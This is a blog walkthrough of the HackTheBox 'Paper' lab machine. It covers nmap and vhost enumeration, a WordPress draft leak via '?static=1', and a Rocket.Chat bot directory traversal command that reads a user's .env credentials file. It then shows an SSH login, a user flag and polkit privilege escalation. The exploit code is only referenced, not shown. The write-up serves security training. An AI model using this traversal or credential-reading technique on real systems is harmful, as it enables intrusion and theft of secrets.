B3nj1
B3nj1
Home

HacktheBox - Paper

~

This machine plays a cve that when the machine was released was discovered.

Enumeration

Nmap

In the scan we obtain 3 ports only:

22 –> SSH

80 –> HTTP

443 —> HTTPS

# Nmap 7.91 scan initiated Sat Feb 12 16:31:45 2022 as: nmap -sCV -v -T5 -Pn -oN nmap/scanport.log 10.10.11.143
Warning: 10.10.11.143 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.143
Host is up (0.065s latency).
Not shown: 577 filtered ports, 420 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after:  2022-07-08T10:32:34
| MD5:   579a 92bd 803c ac47 d49c 5add e44e 4f84
|_SHA-1: 61a2 301f 9e5c 2603 a643 00b5 e5da 5fd5 c175 f3a9
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 16:34:09 2022 -- 1 IP address (1 host up) scanned in 144.47 seconds

Tecnology

Looking at the technologies involved in the machine I see a domain:

  • office.paper
Summary: Email[webmaster@example.com], PoweredBy[CentOS], MetaGenerator[HTML Tidy for HTML5 for Linux version 5.7.28], UncommonHeaders[x-backend-server], HTTPServer[CentOS]
[Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9], OpenSSL[1.1.1k], Apache[2.4.37][mod_fcgid/2.3.9], HTML5, X-Backend[office.paper]

Subdomain

We add this to /etc/hosts

  • office.paper
  • chat.office.paper
  • office.htb
gobuster vhost -u http://office.paper -w ~/Documents/Seclists/Discovery/DNS/subdomains-top1million-110000.txt -z -q

Found: chat.office.paper (Status: 200) [Size: 223163]

User Potencial

By looking at the comments we can perhaps draw out possible users:

  • Nick
  • prisonmike

Here is a hint of a content that has not been deleted

wordpress-comment

Here we see a vulnerability that allows us to view the draft

https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

Chat

Seeing this we realize that we need a specific url:

rocket-chat

Vuln

http://office.paper/?static=1

Here following how the vulnerability is exploited we would have access to the draft

wp-leak

Register

Here we already have access to the internal chat

http://chat.office.paper/register/8qozr226AhkCHZdyY

channel-general

Bot Testing (Shell Dwight)

Testing the bot I realize that I can read files from the server, here I found an interesting file which is .env

recyclops file ../../../../../home/dwight/hubot/.env

directory-traversal-1

PrivEsc

With this password we found we can use it as the user dwight:

ssh dwight@10.10.11.143                                                                   
dwight@10.10.11.143's password:                                                                    
Activate the web console with: systemctl enable --now cockpit.socket                               
                                                                                                   
Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23                                              
[dwight@paper ~]$ id                                                                               
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)                                              
[dwight@paper ~]$ clear                                                                            
[dwight@paper ~]$ ls                                                                               
bot_restart.sh  hubot  sales  user.txt
[dwight@paper ~]$ cat user.txt 
e5e2ef480b8d49dd2dd1be31c1384812
[dwight@paper ~]$

With linpeas I can see an interesting information which is that it has polkit:

polkit-linpeas

Python

We can use this exploit in Python

exploit-python

root-flag

Bash

We can use this exploit in bash

exploit-run-sh

MACHINE PWNED!!!!!

© 2021 - 2024 B3nj1. All rights reserved

Table of Contents